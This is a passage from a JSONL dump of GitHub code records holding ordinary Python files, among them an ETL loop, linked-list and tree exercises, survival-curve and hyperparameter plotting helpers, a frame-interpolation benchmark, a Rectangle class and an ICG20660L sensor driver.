postgres_dsn,\n redis_config\n)\nfrom extract import PostgresExtractor\nfrom load import ElasticLoader\nfrom state import State\nfrom query import get_query\n\n\nitersize = app_config.batch_size\nfreq = app_config.frequency\nindex = app_config.elastic_index\n\nstate = State(config=redis_config, redis_conn=Redis)\npostgres_extractor = PostgresExtractor(dsn=postgres_dsn)\nelastic_loader = ElasticLoader(config=elastic_config, state=state, index=index)\nelastic_loader.create_index_if_not_exists()\n\n\ndef etl(query: str) -> None:\n \"\"\"Загружает в elasticsearch данные пачками с помощью генераторов.\"\"\"\n data_generator = postgres_extractor.extract_data(query, itersize)\n elastic_loader.bulk_update(data_generator, itersize)\n\n\nif __name__ == '__main__':\n logging.basicConfig(**logger_settings)\n logger = logging.getLogger(__name__)\n\n while True:\n logger.info('Starting etl...')\n modified = state.get_state(\n 'modified',\n default=str(datetime(MINYEAR, 1, 1, tzinfo=timezone.utc))\n )\n\n 
try:\n query = get_query(modified)\n etl(query)\n\n except ValueError as er:\n logger.error('Error: %s', er)\n continue\n\n logger.info('Sleep %s seconds...', freq)\n time.sleep(freq)\n","repo_name":"brivazz/new_admin_panel_sprint_3","sub_path":"etl/postgres_to_es/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1503,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"} +{"seq_id":"72028918596","text":"from typing import Any, Dict, Optional, Union\nfrom mypy_extensions import TypedDict\n\n\nclass LexiconItemInterface(TypedDict, total=True):\n form: str\n lemma: str\n pos: str # or with capital letters POS ?\n gloss: str\n features: Dict[str, Any] # when no features, equal to None ? or empty dict ?\n frequency: int\n\n\ntokenWithoutFeatures = LexiconItemInterface(\n form=\"eating\",\n lemma=\"eat\",\n pos=\"VERB\",\n gloss=\"manger\",\n frequency=178,\n features={},\n)\n\ntokenWithFeatures = LexiconItemInterface(\n form=\"eating\",\n lemma=\"eat\",\n pos=\"VERB\",\n gloss=\"manger\",\n frequency=178,\n features={\"featureInt\": 212, \"featureFloat\": 0.2113, \"featureStr\": \"qwerty\"},\n)\n","repo_name":"Arborator/arborator-backend","sub_path":"app/lexicon/interface.py","file_name":"interface.py","file_ext":"py","file_size_in_byte":703,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"62"} +{"seq_id":"10735388199","text":"class Node:\n def __init__(self, value):\n self.value = value\n self.next = None\n \nclass LinkedList:\n def __init__(self, value):\n new_node = Node(value)\n self.head = new_node\n self.tail = new_node\n self.length = 1\n \n def print_list(self):\n temp = self.head\n while temp is not None:\n print(temp.value)\n temp = temp.next \n \n def make_empty(self):\n self.head = None\n self.tail = None\n self.length = 0\n\n def append(self, value):\n new_node = Node(value)\n if self.length == 0:\n self.head = new_node\n self.tail = new_node\n else:\n self.tail.next = new_node\n self.tail = new_node\n self.length += 1\n return True\n \n def get(self, index):\n if index < 0 or index >= self.length:\n return None\n temp = self.head\n for _ in range(index):\n temp = temp.next\n return temp\n\n def reverse_between(self, start:int, end:int):\n ##### solution 2 #####\n # check if there is anything in the list\n if not self.head:\n return None\n \n # create a dummy node and connect it to the head. 
Create previous node to = dummy\n dummy = Node(0)\n dummy.next = self.head\n prev = dummy\n\n # move prev to the node at one node before starting position.\n for _ in range(start):\n prev = prev.next\n \n # set current to the next node of prev.\n current = prev.next\n\n # Reverse the linked list from position m to n.\n for _ in range(end - start):\n after = current.next\n current.next = after.next\n after.next = prev.next\n prev.next = after\n # update the head of the linked list with the next node of the dummy.\n self.head = dummy.next\n ##### solution 1 #####\n \"\"\"\n if self.length == 0:\n return None\n \n # get first and last node\n start_node = self.get(start)\n end_node = self.get(end)\n \n \n for _ in range(end-start):\n prev_end_node = self.get(end-1)\n \n # switch positions\n temp = start_node.value\n start_node.value = end_node.value\n end_node.value = temp\n \n # move one step closer to each other\n start_node = start_node.next\n end_node = prev_end_node\n end -= 1\n # repeat until they are next to each other or on the same node\n if start_node is end_node:\n return True\n \"\"\"\n\n \n\n\n\nlinked_list = LinkedList(1)\nlinked_list.append(2)\nlinked_list.append(3)\nlinked_list.append(4)\nlinked_list.append(5)\n\nprint(\"Original linked list: \")\nlinked_list.print_list()\n\n# Reverse a sublist within the linked list\nlinked_list.reverse_between(2, 4)\nprint(\"Reversed sublist (2, 4): \")\nlinked_list.print_list()\n\n# Reverse another sublist within the linked list\nlinked_list.reverse_between(0, 4)\nprint(\"Reversed entire linked list: \")\nlinked_list.print_list()\n\n# Reverse a sublist of length 1 within the linked list\nlinked_list.reverse_between(3, 3)\nprint(\"Reversed sublist of length 1 (3, 3): \")\nlinked_list.print_list()\n\n# Reverse an empty linked list\nempty_list = LinkedList(1)\nempty_list.make_empty()\nempty_list.reverse_between(0, 0)\nprint(\"Reversed empty linked list: \")\nempty_list.print_list()\n\n\n\"\"\"\n EXPECTED OUTPUT:\n ----------------\n Original linked list: \n 1\n 2\n 3\n 4\n 5\n Reversed sublist (2, 4): \n 1\n 2\n 5\n 4\n 3\n Reversed entire linked list: \n 3\n 4\n 5\n 2\n 1\n Reversed sublist of length 1 (3, 3): \n 3\n 4\n 5\n 2\n 1\n Reversed empty linked list: \n None\n \n\"\"\"\n","repo_name":"athenasu/data_structures","sub_path":"LinkedList/15. Leetcode- reverse_between.py","file_name":"15. 
Leetcode- reverse_between.py","file_ext":"py","file_size_in_byte":3880,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"} {"seq_id":"5130401816","text":"# Link to the problem : https://leetcode.com/problems/binary-tree-level-order-traversal/\n# Definition for a binary tree node.\n# class TreeNode:\n#     def __init__(self, val=0, left=None, right=None):\n#         self.val = val\n#         self.left = left\n#         self.right = right\n\n\n# Recursive approach \n\nclass Solution:\n    def levelOrder(self, root) :\n        result = []\n        self.TreeTraversal(root,0,result)\n        return result\n    \n    def TreeTraversal(self,node,level,result):\n        if(node == None):\n            return \n        \n        if(len(result) < level + 1) :\n            result.append([])\n        \n        result[level].append(node.val)\n        self.TreeTraversal(node.left , level+1 , result)\n        self.TreeTraversal(node.right , level+ 1 , result)","repo_name":"dsrao711/DSA-Together-HacktoberFest","sub_path":"Binary Trees/LevelOrder/LevelOrder-recursive.py","file_name":"LevelOrder-recursive.py","file_ext":"py","file_size_in_byte":755,"program_lang":"python","lang":"en","doc_type":"code","stars":34,"dataset":"github-code","pt":"62"} {"seq_id":"9980832274","text":"import matplotlib.pyplot as plt\nfrom lifelines import KaplanMeierFitter\n\n\ndef plot_km_curve_for_feature(early_relapse_df, dataframe, feature_identifier):\n    \"\"\"\n    Plot the Kaplan-Meier early_relapse curves for the specified one-hot encoded feature.\n\n    Parameters:\n    - early_relapse_df: The early_relapse data DataFrame.\n    - dataframe: The DataFrame with one-hot encoded features.\n    - feature_identifier: Either the name or the index of the one-hot encoded feature to plot.\n\n    Returns: None\n    \"\"\"\n\n    kmf = KaplanMeierFitter()\n\n    # Check if the identifier is an integer (indicating an index). If so, get the feature name by index.\n    if isinstance(feature_identifier, int):\n        feature_name = dataframe.columns[feature_identifier]\n    else:\n        feature_name = feature_identifier\n\n    # Find common patients between the two dataframes\n    common_patients = early_relapse_df.index.intersection(dataframe.index)\n\n    # Group 0: fit on durations and the event indicator column\n    idx_0 = dataframe.loc[common_patients, feature_name] == 0\n    patient_ids_0 = common_patients[idx_0]\n    kmf.fit(early_relapse_df.loc[patient_ids_0, \"PFS_I_MONTHS\"], early_relapse_df.loc[patient_ids_0, \"early_relapse\"],\n            label=f'{feature_name}_0')\n    kmf.plot_survival_function()\n\n    # Group 1\n    idx_1 = dataframe.loc[common_patients, feature_name] == 1\n    patient_ids_1 = common_patients[idx_1]\n    kmf.fit(early_relapse_df.loc[patient_ids_1, \"PFS_I_MONTHS\"], early_relapse_df.loc[patient_ids_1, \"early_relapse\"],\n            label=f'{feature_name}_1')\n    kmf.plot_survival_function()\n\n    plt.title(f\"Kaplan-Meier early_relapse Curve for {feature_name}\")\n    plt.xlabel(\"Time\")\n    plt.ylabel(\"Probability of early_relapse\")\n    plt.grid(True)\n    plt.show()\n\n\ndef plot_km_curve_for_features(survival_df, dataframe, features, value=1):\n    \"\"\"\n    Plot the Kaplan-Meier survival curves for a list of specified features based on a given value (0 or 1).\n\n    Parameters:\n    - survival_df: The survival data DataFrame.\n    - dataframe: The DataFrame with one-hot encoded features.\n    - features: List of features to plot.\n    - value: The value (0 or 1) to filter the data on for all features. 
Default is 1.\n\n Returns: None\n \"\"\"\n kmf = KaplanMeierFitter()\n\n # Find common patients between the two dataframes\n common_patients = survival_df.index.intersection(dataframe.index)\n\n for feature in features:\n # Check if the feature is given as an integer (indicating index). If so, get the feature name by index.\n if isinstance(feature, int):\n feature = dataframe.columns[feature]\n\n idx = dataframe.loc[common_patients, feature] == value\n patient_ids = common_patients[idx]\n kmf.fit(survival_df.loc[patient_ids, \"PFS_I_MONTHS\"],\n survival_df.loc[patient_ids, \"early_relapse\"],\n label=feature)\n kmf.plot_survival_function()\n\n plt.title(f\"Kaplan-Meier early_relapse Curves\")\n plt.xlabel(\"Time\")\n plt.ylabel(\"Probability of early_relapse\")\n plt.grid(True)\n plt.legend()\n plt.show()\n\n","repo_name":"CereAle99/tesi","sub_path":"early_relapse/lib/km_curve_plot.py","file_name":"km_curve_plot.py","file_ext":"py","file_size_in_byte":3063,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"} +{"seq_id":"40114812803","text":"import sys\nimport glob\n\nfor fyle in glob.glob(\"./ends/*\"):\n ends,total,sample = [],{},fyle.split(\".\")[0]\n with open(fyle,'r') as inp:\n firstline = inp.readline()\n for line in inp:\n ends.append(line.strip())\n\n with open(sys.argv[1],'r') as inp:\n firstline = inp.readline()\n for line in inp:\n total[line.strip().split(\",\")[0]] = \",\".join(line.split(\",\")[1:])\n\n with open(fyle+'_compiled.csv','w') as outp:\n outp.write(firstline)\n for item in sorted(ends):\n outp.write(str(item)+\",\"+total[item])\n","repo_name":"zfmandell/the-workshop","sub_path":"end_strip.py","file_name":"end_strip.py","file_ext":"py","file_size_in_byte":580,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"12530675957","text":"from PyQt4.QtGui import *\nfrom PyQt4.QtCore import *\n\n\nclass BaseButton(QPushButton):\n\n def __init__(self, action, image, *args, **kw):\n super(BaseButton, self).__init__(*args, **kw)\n sze = QSize(24, 24)\n self.setFocusPolicy(Qt.NoFocus)\n self.clicked.connect(action)\n self.setMinimumSize(sze)\n self.setMaximumSize(sze)\n self.setIcon(QIcon(image))\n self.setStyleSheet('border: 0px solid #000000;')\n\nclass ToggleButton(BaseButton):\n\n def __init__(self, active, action, image_t, image_f, *args, **kw):\n super(ToggleButton, self).__init__(action, image_t, *args, **kw)\n self.status = active\n self._image_t = QIcon(image_t)\n self._image_f = QIcon(image_f)\n self.clicked.connect(self._toggle)\n self._set_icon()\n\n def _set_icon(self):\n if self.status:\n self.setIcon(self._image_t)\n else:\n self.setIcon(self._image_f)\n\n def _toggle(self):\n self.status = not self.status\n self._set_icon()\n return self.status\n","repo_name":"thrstnh/pymp","sub_path":"src/pymp/ui/widgets.py","file_name":"widgets.py","file_ext":"py","file_size_in_byte":1067,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"39347506368","text":"x = int(input())\nn = int(input())\nm = []\ntotal = 0\nfor i in input().split():\n m.append(int(i))\nm.sort(reverse=True)\n\nfor i, brick in enumerate(m):\n l = (i) // x\n w = l * 0.65 * brick\n total += 
w\n\nprint(\"{:.3f}\".format(total))\n","repo_name":"LakeSuburbia/CodingGame","sub_path":"Puzzles/EASY/Python/BrickInTheWall.py","file_name":"BrickInTheWall.py","file_ext":"py","file_size_in_byte":238,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"71138712911","text":"import os\nimport sys\nsys.path.append('.')\nimport cv2\nimport math\nimport torch\nimport argparse\nimport numpy as np\nfrom torch.nn import functional as F\nfrom model.pytorch_msssim import ssim_matlab\nfrom model.RIFT import RIFT\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--oldmodel', dest='use_old_model', action='store_true', \n help='Use the old model in the RIFE repo')\nparser.add_argument('--hd', action='store_true', help='Use newer HD model')\nparser.add_argument('--cp', type=str, default=None, help='Load checkpoint from this path')\nparser.add_argument('--count', type=int, default=-1, help='Evaluate on the first count images')\nparser.add_argument('--multi', dest='multi', default=\"8,8,4\", type=str, metavar='M', \n help='Output M groups of flow') \nparser.add_argument('--each', dest='out_summary', action='store_false', \n help='Output the scores of each frame instead of outputting summary only')\n\nargs = parser.parse_args()\nargs.multi = [ int(m) for m in args.multi.split(\",\") ]\nif args.out_summary:\n endl = \"\\r\"\nelse:\n endl = \"\\n\"\n\nprint(f\"Args:\\n{args}\")\n\nif args.use_old_model:\n model = RIFT(use_old_model=True)\n model.load_model('checkpoints/rife.pth')\nelif args.hd:\n from model.rife_new.v4_0.RIFE_HDv3 import Model\n model = Model()\n if not hasattr(model, 'version'):\n model.version = 0\n # -1: rank. If rank <= 0, remove \"module\" prefix from state_dict keys.\n model.load_model('checkpoints/rife-hd.pth', -1)\n print(\"Loaded 3.x/4.x HD model.\")\nelse:\n model = RIFT(multi=args.multi)\n model.load_model(args.cp)\n\nmodel.eval()\nmodel.device()\n\npath = 'data/vimeo_triplet/'\ntestlist_path = path + 'tri_testlist.txt'\nf = open(testlist_path, 'r')\npsnr_list = []\nssim_list = []\n# Don't count empty lines (\"\\n\" or \"\\r\\n\")\ntotal_triplets = sum(len(line) > 2 for line in open(testlist_path, 'r'))\n\nfor i, line in enumerate(f):\n if args.count > 0 and i == args.count:\n break\n\n name = str(line).strip()\n if(len(name) <= 1):\n continue\n # print(path + 'sequences/' + name + '/im1.png')\n I0 = cv2.imread(path + 'sequences/' + name + '/im1.png')\n I1 = cv2.imread(path + 'sequences/' + name + '/im2.png')\n I2 = cv2.imread(path + 'sequences/' + name + '/im3.png')\n I0 = (torch.tensor(I0.transpose(2, 0, 1)).to(device) / 255.).unsqueeze(0)\n I2 = (torch.tensor(I2.transpose(2, 0, 1)).to(device) / 255.).unsqueeze(0)\n mid = model.inference(I0, I2)[0]\n ssim = ssim_matlab(torch.tensor(I1.transpose(2, 0, 1)).to(device).unsqueeze(0) / 255., torch.round(mid * 255).unsqueeze(0) / 255.).detach().cpu().numpy()\n mid = np.round((mid * 255).detach().cpu().numpy()).astype('uint8').transpose(1, 2, 0) / 255. 
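\n    # Added note: PSNR below is computed as -10*log10(MSE) on [0, 1]-scaled arrays,\n    # while SSIM above is measured against the rounded 8-bit prediction.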
\n I1 = I1 / 255.\n psnr = -10 * math.log10(((I1 - mid) * (I1 - mid)).mean())\n psnr_list.append(psnr)\n ssim_list.append(ssim)\n print(\"{}/{} {} PSNR {:.3f} Avg {:.3f}, SSIM {:.3f} Avg {:.3f}\".format( \\\n i+1, total_triplets, name, psnr, np.mean(psnr_list), ssim, np.mean(ssim_list)), end=endl)\n\nif args.out_summary:\n print()\n ","repo_name":"askerlee/rift","sub_path":"benchmark/Vimeo90K.py","file_name":"Vimeo90K.py","file_ext":"py","file_size_in_byte":3188,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"83"} +{"seq_id":"12644150751","text":"from lib import graph as graph_helper\nimport os\nfrom multiprocessing.pool import Pool\nimport pandas as pd\nimport argparse\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\n \"--graph_dir\", type=str, help=\"input graph dir\", default=\"data/graphs/vecroad_4/graphs_junc/\"\n)\nparser.add_argument(\n \"--save_dir\", type=str, help=\"save wkt dir\", default=\"data/graphs/vecroad_4/graphs_junc_wkt/\"\n)\n\nargs = parser.parse_args()\n\nos.makedirs(args.save_dir, exist_ok=True)\n\ndef worker(f):\n print(f)\n name = f.split('.')[0]\n g = graph_helper.read_graph(os.path.join(args.graph_dir, f))\n g = g.clear_self()\n wkt = g.convert_rs_to_wkt()\n all_data = []\n for linestring in wkt:\n all_data.append((\"AOI_0_{}_img0\".format(name), linestring))\n df = pd.DataFrame(all_data, columns=['ImageId', 'WKT_Pix'])\n df.to_csv(os.path.join(args.save_dir, name + '.csv'), index=False)\n\nfiles = os.listdir(args.graph_dir)\npool = Pool()\npool.map(worker, files)\npool.close()\npool.join()\n","repo_name":"tansor/VecRoad","sub_path":"eval/graph2wkt.py","file_name":"graph2wkt.py","file_ext":"py","file_size_in_byte":994,"program_lang":"python","lang":"en","doc_type":"code","stars":48,"dataset":"github-code","pt":"83"} +{"seq_id":"14741802068","text":"#!/usr/bin/python3\n\"\"\"This module contains the 'Rectangle' class\"\"\"\nfrom models.base import Base\n\n\nclass Rectangle(Base):\n \"\"\"Class 'Rectangle' declared and defined\"\"\"\n\n def __init__(self, width, height, x=0, y=0, id=None):\n \"\"\"Initialization method\"\"\"\n self.width = width\n self.height = height\n self.x = x\n self.y = y\n super().__init__(id)\n\n @property\n def width(self):\n \"\"\"Getter method retrieves 'width' attribute\"\"\"\n return self.__width\n\n @width.setter\n def width(self, value):\n \"\"\"Setter method that sets value for 'width' attribute\"\"\"\n if not isinstance(value, int):\n raise TypeError(\"width must be an integer\")\n if value <= 0:\n raise ValueError(\"width must be > 0\")\n self.__width = value\n\n @property\n def height(self):\n \"\"\"Getter method that retrieves 'height' attribute\"\"\"\n return self.__height\n\n @height.setter\n def height(self, value):\n \"\"\"Setter method that sets value for 'height' attribute\"\"\"\n if not isinstance(value, int):\n raise TypeError(\"height must be an integer\")\n if value <= 0:\n raise ValueError(\"height must be > 0\")\n self.__height = value\n\n @property\n def x(self):\n \"\"\"Getter method that retrieves 'x' attribute\"\"\"\n return self.__x\n\n @x.setter\n def x(self, value):\n \"\"\"Setter method that sets value for 'x' attribute\"\"\"\n if not isinstance(value, int):\n raise TypeError(\"x must be an integer\")\n if value < 0:\n raise ValueError(\"x must be >= 0\")\n self.__x = value\n\n @property\n def y(self):\n \"\"\"Getter method that retrieves 'y' attribute\"\"\"\n return self.__y\n\n @y.setter\n def y(self, value):\n \"\"\"Setter method that sets value for 
'y' attribute\"\"\"\n if not isinstance(value, int):\n raise TypeError(\"y must be an integer\")\n if value < 0:\n raise ValueError(\"y must be >= 0\")\n self.__y = value\n\n def __str__(self):\n \"\"\"String method to represent class instance\"\"\"\n return f\"[{self.__class__.__name__}] ({self.id}) {self.x}\\\n/{self.y} - {self.width}/{self.height}\"\n\n def area(self):\n \"\"\"Method that computes area of a rectangle\"\"\"\n return self.width * self.height\n\n def display(self):\n \"\"\"Method that prints to stdout the 'Rectangle' instance\n with the character '#'\n \"\"\"\n for i in range(self.y):\n print()\n for i in range(self.height):\n print(\" \" * self.x, end='')\n print(\"#\" * self.width)\n\n def update(self, *args, **kwargs):\n \"\"\"Method to assign an argument to each attribute\"\"\"\n if 'id' in kwargs and len(args) == 0:\n self.id = kwargs['id']\n elif len(args) > 0:\n self.id = args[0]\n if 'width' in kwargs and len(args) < 2:\n self.width = kwargs['width']\n elif len(args) > 1:\n self.width = args[1]\n if 'height' in kwargs and len(args) < 3:\n self.height = kwargs['height']\n elif len(args) > 2:\n self.height = args[2]\n if 'x' in kwargs and len(args) < 4:\n self.x = kwargs['x']\n elif len(args) > 3:\n self.x = args[3]\n if 'y' in kwargs and len(args) < 5:\n self.y = kwargs['y']\n elif len(args) > 4:\n self.y = args[4]\n\n def to_dictionary(self):\n \"\"\"Method that returns dictionary representation of\n a 'Rectangle' instance\n \"\"\"\n return {'id': self.id, 'width': self.width, 'height': self.height,\n 'x': self.x, 'y': self.y}\n","repo_name":"LeRoy-M/alx-higher_level_programming","sub_path":"0x0C-python-almost_a_circle/models/rectangle.py","file_name":"rectangle.py","file_ext":"py","file_size_in_byte":3723,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"34416854729","text":"\"\"\"Plotting functions.\"\"\"\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport hpbandster.core.result as hpres\nimport hpbandster.visualization as hpvis\n\n\ndef plot_lr_vs_filter(results: np.array) -> None:\n \"\"\"Plot the learning rate versus the number of filter.\n\n Args:\n result: Structure of metrics\n\n Returns:\n None\n \"\"\"\n\n final_errors = np.array([val_errors[-1] for _, _, val_errors in results])\n num_filters = [sum([config[k] for k in sorted(config.keys()) if k.startswith(\n 'num_filters')]) for _, config, _ in results]\n learning_rates = [config['lr'] for _, config, _ in results]\n\n sizes = 10 + 90 * final_errors\n plt.xscale('log')\n plt.xlabel('learning rate'), plt.ylabel('# filters')\n plt.title(\n 'size, color $\\\\propto$ validation error at epoch {}'.format(\n len(final_errors)))\n plt.scatter(learning_rates, num_filters, s=sizes, c=final_errors)\n plt.colorbar()\n plt.show()\n\n\ndef plot_error_curves(results: np.array) -> None:\n \"\"\"Plot the validation errors over time (epochs).\n\n Args:\n result: Structure of metrics\n\n Returns:\n None\n \"\"\"\n\n for _, _, val_errors in results:\n plt.plot(range(1, 10), val_errors)\n\n plt.xlabel('epochs'), plt.ylabel('validation error')\n plt.title('Learning curves for different hyperparameters')\n plt.axvline(1), plt.axvline(3), plt.axvline(9)\n plt.show()\n\n\ndef plot_finished_runs(result: hpres.Result) -> None:\n \"\"\"Plot the finished runs over time.\n\n Args:\n result: Hpbandster result object\n\n Returns:\n None\n \"\"\"\n all_runs = result.get_all_runs()\n\n fig, ax = hpvis.finished_runs_over_time(all_runs)\n fig.set_size_inches((12, 12))\n 
plt.show()\n\n\ndef plot_rankings(result: hpres.Result) -> None:\n \"\"\"Plot the rank correlation.\n\n Args:\n result: Hpbandster result object\n\n Returns:\n None\n \"\"\"\n all_runs = result.get_all_runs()\n\n fig, ax = hpvis.correlation_across_budgets(result)\n fig.set_size_inches((12, 12))\n plt.show()\n\n\ndef plot_losses(result: hpres.Result) -> None:\n \"\"\"Plot the losses over time.\n\n Args:\n result: Hpbandster result object\n\n Returns:\n None\n \"\"\"\n all_runs = result.get_all_runs()\n\n fig, ax = hpvis.losses_over_time(all_runs)\n fig.set_size_inches((12, 12))\n plt.show()\n\n\ndef plot_histograms(result: hpres.Result) -> None:\n \"\"\"Plot the finished runs over time.\n\n Args:\n result: Hpbandster result object\n\n Returns:\n None\n \"\"\"\n all_runs = result.get_all_runs()\n id2conf = result.get_id2config_mapping()\n\n fig, ax = hpvis.performance_histogram_model_vs_random(all_runs, id2conf)\n fig.set_size_inches((12, 12))\n plt.show()\n","repo_name":"ercembu/freiburg","sub_path":"1-1/dl/dl2021-ex09-hpo-dl2021-pes/lib/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":2756,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"72336197391","text":"import sys\nimport smbus\nimport time\nimport RPi.GPIO as GPIO\nimport spidev\n\nclass DFRobot_ICG20660L:\n IIC_ADDR_SDO_H = 0x69\n IIC_ADDR_SDO_L = 0x68\n ICG20660L_DEVICE_ID = 0x91\n CLOCK_SEL_PLL = 1\n ADC_MAX_RANGE = 32767.0\n GYRO_FULL_SCALE_125DPS = 125.0\n GYRO_FULL_SCALE_250DPS = 250.0\n GYRO_FULL_SCALE_500DPS = 500.0\n ACCEL_FULL_SCALE_2G = 2\n ACCEL_FULL_SCALE_4G = 4\n ACCEL_FULL_SCALE_8G = 8\n ACCEL_FULL_SCALE_16G = 16\n\n REG_ICG20660L_SMPLRT_DIV = 0x19\n \n REG_ICG20660L_ACCEL_CONFIG2= 0x1D\n '''\n #ACCELEROMETER CONFIGURATION 2, addr:0x1D,acess:rw\n # ---------------------------------------------------------\n # | b7 | b6 | b5 | b4 | b3 | b2 | b1 | b0 |\n # ---------------------------------------------------------\n # | FIFO_SIZE | DEC2_CFG | ACCEL_FCHOICE_B | A_DLPF_CFG |\n # ---------------------------------------------------------\n '''\n BIT_FIFO_SIZE = 6\n OFFSET_FIFO_SIZE = 0x03\n BIT_DEC2_CFG = 4\n OFFSET_DEC2_CFG = 0x03\n BIT_ACCEL_FCHOICE_B = 3\n OFFSET_ACCEL_FCHOICE_B = 0x01\n BIT_A_DLPF_CFG = 0\n OFFSET_A_DLPF_CFG = 0x07\n \n REG_ICG20660L_INT_ENABLE = 0x38\n '''\n #INT_ENABLE register:addr:0x38,acess:rw\n # -----------------------------------------------------------------\n # | b7 | b6 | b5 | b4 | b3 | b2 | b1 | b0 |\n # -----------------------------------------------------------------\n # | WOM_EN | FIFO_OFLOW_EN | rsv | DATA_RDY_INT_EN |\n # -----------------------------------------------------------------\n '''\n BIT_WOM_EN = 5\n OFFSET_WOM_EN = 0x07\n BIT_FIFO_OFLOW_EN = 4\n OFFSET_FIFO_OFLOW_EN = 0x01\n BIT_DATA_RDY_INT_EN = 0\n OFFSET_DATA_RDY_INT_EN = 0x01\n \n \n REG_ICG20660L_PWR_MGMT_1 = 0x6B\n '''\n #PWR_MGMT_1 register description:addr:0x6B,acess:rw\n # -------------------------------------------------------------------------\n # | b7 | b6 | b5 | b4 | b3 | b2 | b1 | b0 |\n # -------------------------------------------------------------------------\n # | DEVICE_RESET | SLEEP | CYCLE | GYRO_STANDBY | TEMP_DIS | CLKSEL[2:0] |\n # -------------------------------------------------------------------------\n '''\n BIT_DEVICE_RESET = 7\n OFFSET_DEVICE_RESET = 0x01\n BIT_SLEEP = 6\n OFFSET_SLEEP = 0x01\n BIT_CYCLE = 5\n OFFSET_CYCLE = 0x01\n BIT_GYRO_STANDBY = 4\n OFFSET_GYRO_STANDBY = 0x01\n BIT_TEMP_DIS = 3\n OFFSET_TEMP_DIS = 
0x01\n BIT_CLKSEL = 0\n OFFSET_CLKSEL = 0x07\n\n REG_ICG20660L_PWR_MGMT_2 = 0x6C\n '''\n #PWR_MGMT_2 register:addr:0x6C,acess:rw\n # -------------------------------------------------------------------------------\n # | b7 | b6 | b5 | b4 | b3 | b2 | b1 | b0 |\n # -------------------------------------------------------------------------------\n # | FIFO_LP_EN | rsv | STBY_XA | STBY_YA | STBY_ZA | STBY_XG | STBY_YG | STBY_ZG|\n # -------------------------------------------------------------------------------\n '''\n BIT_FIFO_LP_EN = 7\n OFFSET_FIFO_LP_EN = 0x01\n BIT_STBY_XA = 5\n OFFSET_STBY_XA = 0x01\n BIT_STBY_YA = 4\n OFFSET_STBY_YA = 0x01\n BIT_STBY_ZA = 3\n OFFSET_STBY_ZA = 0x01\n BIT_STBY_XG = 2\n OFFSET_STBY_XG = 0x01\n BIT_STBY_YG = 1\n OFFSET_STBY_YG = 0x01\n BIT_STBY_ZG = 0\n OFFSET_STBY_ZG = 0x01\n\n REG_ICG20660L_FIFO_COUNTH = 0x72\n REG_ICG20660L_FIFO_COUNTL = 0x73\n REG_ICG20660L_FIFO_R_W = 0x74\n \n REG_ICG20660L_SELF_TEST_X_GYRO = 0x00\n REG_ICG20660L_SELF_TEST_Y_GYRO = 0x01\n REG_ICG20660L_SELF_TEST_Z_GYRO = 0x02\n REG_ICG20660L_XG_OFFS_TC_H = 0x04\n REG_ICG20660L_XG_OFFS_TC_L = 0x05\n REG_ICG20660L_YG_OFFS_TC_H = 0x07\n REG_ICG20660L_YG_OFFS_TC_L = 0x08\n REG_ICG20660L_ZG_OFFS_TC_H = 0x0A\n REG_ICG20660L_ZG_OFFS_TC_L = 0x0B\n REG_ICG20660L_SELF_TEST_X_ACCEL = 0x0D\n REG_ICG20660L_SELF_TEST_Y_ACCEL = 0x0E\n REG_ICG20660L_SELF_TEST_Z_ACCEL = 0x0F\n REG_ICG20660L_XG_OFFS_USRH = 0x13\n REG_ICG20660L_XG_OFFS_USRL = 0x14\n REG_ICG20660L_YG_OFFS_USRH = 0x15\n REG_ICG20660L_YG_OFFS_USRL = 0x16\n REG_ICG20660L_ZG_OFFS_USRH = 0x17\n REG_ICG20660L_ZG_OFFS_USRL = 0x18\n REG_ICG20660L_CONFIG = 0x1A\n '''\n #Config register:addr:0x1A,acess:rw\n # -------------------------------------------------\n # | b7 | b6 | b5 | b4 | b3 | b2 | b1 | b0 |\n # -------------------------------------------------\n # | rsv | FIFO_MODE | EXT_SYNC_SET | DLPF_CFG |\n # -------------------------------------------------\n '''\n BIT_FIFO_MODE = 6\n OFFSET_FIFO_MODE = 0x01\n BIT_EXT_SYNC_SET = 3\n OFFSET_EXT_SYNC_SET = 0x07\n BIT_DLPF_CFG = 0\n OFFSET_DLPF_CFG = 0x07\n\n REG_ICG20660L_GYRO_CONFIG = 0x1B\n '''\n #GYRO_CONFIG register:addr:0x1B,acess:rw\n # -----------------------------------------------------\n # | b7 | b6 | b5 | b4 | b3 | b2 | b1 | b0 |\n # -----------------------------------------------------\n # | XG_ST | YG_ST | ZG_ST | FS_SEL | rsv | FCHOICE_B |\n # -----------------------------------------------------\n '''\n BIT_XG_ST = 7\n OFFSET_XG_ST = 0x01\n BIT_YG_ST = 6\n OFFSET_YG_ST = 0x01\n BIT_ZG_ST = 5\n OFFSET_ZG_ST = 0x01\n BIT_FS_SEL = 3\n OFFSET_FS_SEL = 0x03\n BIT_FCHOICE_B = 0\n OFFSET_FCHOICE_B = 0x03\n\n REG_ICG20660L_ACCEL_CONFIG = 0x1C\n '''\n #ACCEL_CONFIG:addr:0x1C,acess:rw\n # -------------------------------------------------------\n # | b7 | b6 | b5 | b4 | b3 | b2 | b1 | b0 |\n # -------------------------------------------------------\n # | XA_ST | YA_ST | ZA_ST | ACCEL_FS_SEL | rsv |\n # -------------------------------------------------------\n '''\n BIT_XA_ST = 7\n OFFSET_XA_ST = 0x01\n BIT_YA_ST = 6\n OFFSET_YA_ST = 0x01\n BIT_ZA_ST = 5\n 